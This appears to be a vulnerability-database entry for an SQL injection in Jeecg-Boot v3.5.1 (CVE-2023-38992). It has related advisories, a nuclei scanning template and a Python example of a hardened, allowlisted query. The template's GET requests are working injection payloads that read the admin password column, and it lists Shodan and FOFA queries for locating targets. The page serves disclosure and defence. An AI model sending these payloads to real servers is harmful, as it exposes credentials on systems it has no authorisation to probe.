Jeecg-Boot v3.5.1 - SQL Injection

26 Jun 2026 18:13:08. Reported by ProjectDiscovery. Type: nuclei. Source: github.com. 44 views.

Jeecg-Boot v3.5.1 is vulnerable to SQL injection via the title parameter, leading to unauthorized access to sensitive data. Implement input validation and parameterized queries for remediation.

Related

Reporter               Title                                            Published          Family
ATTACKERKB             CVE-2023-38992                                   28 Jul 2023 15:15  attackerkb
Circl                  CVE-2023-38992                                   28 Jul 2023 18:35  circl
CNNVD                  Jeecg-Boot SQL injection vulnerability           28 Jul 2023 00:00  cnnvd
CVE                    CVE-2023-38992                                   28 Jul 2023 00:00  cve
Cvelist                CVE-2023-38992                                   28 Jul 2023 00:00  cvelist
Github Security Blog   SQL injection in jeecg-boot                      28 Jul 2023 15:30  github
NVD                    CVE-2023-38992                                   28 Jul 2023 15:15  nvd
OSV                    GHSA-WP6C-29R3-JQW9 SQL injection in jeecg-boot  28 Jul 2023 15:30  osv
Prion                  Sql injection                                    28 Jul 2023 15:15  prion
Positive Technologies  PT-2023-26721 · Unknown · Jeecg-Boot             28 Jul 2023 00:00  ptsecurity

Code
id: CVE-2023-38992

info:
  name: Jeecg-Boot v3.5.1 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL injection vulnerability via the title parameter at /sys/dict/loadTreeData in jeecg-boot v3.5.1.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Implement input validation and use parameterized queries to prevent SQL Injection attacks.
  reference:
    - https://github.com/jeecgboot/jeecg-boot/issues/5173
    - https://my.oschina.net/jeecg/blog/10107636
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38992
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-38992
    cwe-id: CWE-89
    epss-score: 0.72043
    epss-percentile: 0.99353
    cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.1:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    verified: true
    shodan-query: http.favicon.hash:1380908726
    fofa-query: icon_hash=1380908726
  tags: cve,cve2023,jeecg,jeecg-boot,sqli,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"
      - "{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"

    payloads:
      path:
        -
        - jeecg-boot/

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "parentId\":", "key\":", "{\"title", "success\":true")'
          - 'contains(header, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 490a00463044022033de63692f00666872ca623ea2332543521106f85233fd31940f8d7a726345e3022000d1acced46ce969925287d4998880688f796bc3c0fe71ceabac900c6edc2800:922c64590222798bb761d5b6d8e72950
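The template's remediation note says to validate input and use parameterized queries. The request the template sends shows why both are needed: tableName, text, code and pidField are SQL identifiers, which a database driver cannot bind as parameters, while pid is a plain value that can be. The block below is an added example (not jeecg-boot's code and not part of the nuclei template) showing the vulnerable string-building pattern next to a hardened loader that allowlists identifiers and binds the value; the table layout, the column allowlist and the sample rows are constructed for the demonstration.

```python
# Added example (not jeecg-boot's code and not part of the nuclei template):
# a tree-loader query hardened against CWE-89 the way the template's
# remediation note describes. Identifiers (table and column names) cannot be
# bound as query parameters, so they are checked against an allowlist; the
# lookup value is bound with a placeholder. Table layout, column allowlist
# and sample rows are constructed for this demonstration.
import re
import sqlite3

# Per-table allowlist of columns the endpoint may read back (constructed).
# The password column is deliberately absent: the loader can never select it.
ALLOWED_COLUMNS = {
    "sys_user": {"id", "username", "realname", "status"},
    "sys_depart": {"id", "depart_name", "parent_id"},
}
IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def build_tree_sql_unsafe(table_name, text, code, pid_field, pid):
    """The vulnerable pattern: every request parameter is pasted into SQL."""
    return (f"SELECT {text}, {code} FROM {table_name} "
            f"WHERE {pid_field} = '{pid}'")


def _checked_identifier(table, ident):
    """Accept an identifier only if it is well-formed and allowlisted."""
    ident = ident.strip()
    if not IDENT_RE.fullmatch(ident) or ident not in ALLOWED_COLUMNS.get(table, ()):
        raise ValueError(f"identifier not allowed: {ident!r}")
    return ident


def load_tree_data(conn, table_name, text, code, pid_field, pid):
    """Hardened loader: allowlisted identifiers, bound value for pid."""
    if table_name not in ALLOWED_COLUMNS:
        raise ValueError(f"table not allowed: {table_name!r}")
    text_cols = [_checked_identifier(table_name, c) for c in text.split(",")]
    code_col = _checked_identifier(table_name, code)
    pid_col = _checked_identifier(table_name, pid_field)
    sql = (f"SELECT {', '.join(text_cols)}, {code_col} FROM {table_name} "
           f"WHERE {pid_col} = ?")
    return conn.execute(sql, (pid,)).fetchall()


def rejects(conn, *args):
    """True if the hardened loader refuses the request with ValueError."""
    try:
        load_tree_data(conn, *args)
    except ValueError:
        return True
    return False


def make_demo_db():
    """In-memory sys_user table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_user (id TEXT, username TEXT, realname TEXT, "
                 "password TEXT, status INTEGER)")
    conn.executemany(
        "INSERT INTO sys_user VALUES (?, ?, ?, ?, ?)",
        [("1", "admin", "Administrator", "HASH-PLACEHOLDER-1", 1),
         ("2", "jsmith", "J. Smith", "HASH-PLACEHOLDER-2", 1)],
    )
    return conn


if __name__ == "__main__":
    db = make_demo_db()
    print(load_tree_data(db, "sys_user", "realname,id", "username", "username", "admin"))
    # Inputs shaped like the template's probes are refused before any SQL runs.
    print(rejects(db, "sys_user t", "realname,id", "username", "username", "admin"))
    print(rejects(db, "sys_user", "password text,id", "password", "username", "admin"))
```

The allowlist is the part that parameterization alone cannot provide: a request naming a table alias or an extra column is refused before a statement is built, and a malformed pid value is compared literally against the bound column rather than interpreted as SQL.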


04 Feb 2026 07:00 (current)
Vulners AI Score: 7.3 (High risk)
CVSS 3.1: 9.8
EPSS: 0.72043
SSVC: (none listed)
Views: 44